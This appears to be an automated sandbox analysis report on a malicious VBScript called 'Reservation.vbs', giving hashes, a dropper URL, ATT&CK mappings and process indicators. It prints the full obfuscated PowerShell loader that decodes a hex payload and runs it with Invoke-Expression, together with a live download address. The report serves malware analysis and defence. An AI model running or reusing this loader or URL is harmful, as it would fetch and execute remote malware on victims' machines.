20031bbf53fc23ccbcc482f37c73975ffe6187151e49939f924b468ab566c73c

General

Target

Reservation.vbs
Size

7KB
MD5

ec9f108d335607135782af17ab903592
SHA1

8587a5bb04991cf200922d0a9dbd8e12a8f5691f
SHA256

20031bbf53fc23ccbcc482f37c73975ffe6187151e49939f924b468ab566c73c
SHA512

6a0e16d81fa2394780b099ca3d4b2ac3d609d93fb5b9bc5af759ce1004d17ac922ffb2b749c75c1b869ad0451b96185747da03b336caf5ff13ae1a9e844d797b

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.112.210.240/njbypass.txt

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

332 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 332 powershell.exe

pid	process
332	powershell.exe

description	pid	process
Token: SeDebugPrivilege	332	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1084 wrote to memory of 332	1084	WScript.exe	powershell.exe
PID 1084 wrote to memory of 332	1084	WScript.exe	powershell.exe
PID 1084 wrote to memory of 332	1084	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reservation.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13WSEDRFGTYHUJIK112WSEDRFGTYHUJIK210WSEDRFGTYHUJIK240/njbypassWSEDRFGTYHUJIKtxt'.Replace('WSEDRFGTYHUJIK','.');$SOS='%!SXDCFVGBHNJ!5SXDCFVGBHNJ!!SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ!dSXDCFVGBHNJ!bSXDCFVGBHNJ!!SXDCFVGBHNJ!5SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%0SXDCFVGBHNJ3dSXDCFVGBHNJ%0SXDCFVGBHNJ%7SXDCFVGBHNJ*eSXDCFVGBHNJ!5SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ!5SXDCFVGBHNJ*%SXDCFVGBHNJ!3SXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ5!SXDCFVGBHNJ%7SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ7!SXDCFVGBHNJ%eSXDCFVGBHNJ57SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ*cSXDCFVGBHNJ!9SXDCFVGBHNJ!5SXDCFVGBHNJ!eSXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3bSXDCFVGBHNJ0aSXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ!bSXDCFVGBHNJ%0SXDCFVGBHNJ3dSXDCFVGBHNJ%0SXDCFVGBHNJ%7SXDCFVGBHNJ!!SXDCFVGBHNJ!fSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ*1SXDCFVGBHNJ!!SXDCFVGBHNJ53SXDCFVGBHNJ5!SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ!7SXDCFVGBHNJ%7SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ57SXDCFVGBHNJ*eSXDCFVGBHNJ!cSXDCFVGBHNJ*fSXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ7%SXDCFVGBHNJ!9SXDCFVGBHNJ*eSXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3bSXDCFVGBHNJ0aSXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ57SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!5SXDCFVGBHNJ!3SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ59SXDCFVGBHNJ!8SXDCFVGBHNJ55SXDCFVGBHNJ!aSXDCFVGBHNJ!9SXDCFVGBHNJ53SXDCFVGBHNJ!!SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%0SXDCFVGBHNJ3dSXDCFVGBHNJ%7SXDCFVGBHNJ!9SXDCFVGBHNJ*0SXDCFVGBHNJ!5SXDCFVGBHNJ58SXDCFVGBHNJ%8SXDCFVGBHNJ*eSXDCFVGBHNJ*0SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ*0SXDCFVGBHNJ*3SXDCFVGBHNJ*0SXDCFVGBHNJ5!SXDCFVGBHNJ%0SXDCFVGBHNJ%!SXDCFVGBHNJ!5SXDCFVGBHNJ!!SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ!dSXDCFVGBHNJ!bSXDCFVGBHNJ!!SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ53SXDCFVGBHNJ!!SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ%9SXDCFVGBHNJ%7SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ*5SXDCFVGBHNJ*0SXDCFVGBHNJ57SXDCFVGBHNJ*0SXDCFVGBHNJ%dSXDCFVGBHNJ!fSXDCFVGBHNJ*%SXDCFVGBHNJ*aSXDCFVGBHNJ*0SXDCFVGBHNJ!5SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ!5SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ!bSXDCFVGBHNJ%8SXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ5aSXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3bSXDCFVGBHNJ0aSXDCFVGBHNJ%*SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ!9SXDCFVGBHNJ%7SXDCFVGBHNJ%bSXDCFVGBHNJ%7SXDCFVGBHNJ!5SXDCFVGBHNJ58SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%8SXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ57SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!5SXDCFVGBHNJ!3SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ59SXDCFVGBHNJ!8SXDCFVGBHNJ55SXDCFVGBHNJ!aSXDCFVGBHNJ!9SXDCFVGBHNJ53SXDCFVGBHNJ!!SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%0SXDCFVGBHNJ%dSXDCFVGBHNJ!aSXDCFVGBHNJ*fSXDCFVGBHNJ*9SXDCFVGBHNJ*eSXDCFVGBHNJ%0SXDCFVGBHNJ%7SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ7cSXDCFVGBHNJ%*SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ!9SXDCFVGBHNJ%7SXDCFVGBHNJ%bSXDCFVGBHNJ%7SXDCFVGBHNJ!5SXDCFVGBHNJ58SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split 'SXDCFVGBHNJ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:332

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/332-54-0x0000000000000000-mapping.dmp

Download
memory/332-56-0x000007FEF2B00000-0x000007FEF365D000-memory.dmp

Filesize
11.4MB

Download
memory/332-58-0x0000000002592000-0x0000000002594000-memory.dmp

Filesize
8KB

Download
memory/332-57-0x0000000002590000-0x0000000002592000-memory.dmp

Filesize
8KB

Download
memory/332-59-0x0000000002594000-0x0000000002597000-memory.dmp

Filesize
12KB

Download
memory/332-60-0x000000000259B000-0x00000000025BA000-memory.dmp

Filesize
124KB

Download
memory/1084-53-0x000007FEFBA11000-0x000007FEFBA13000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing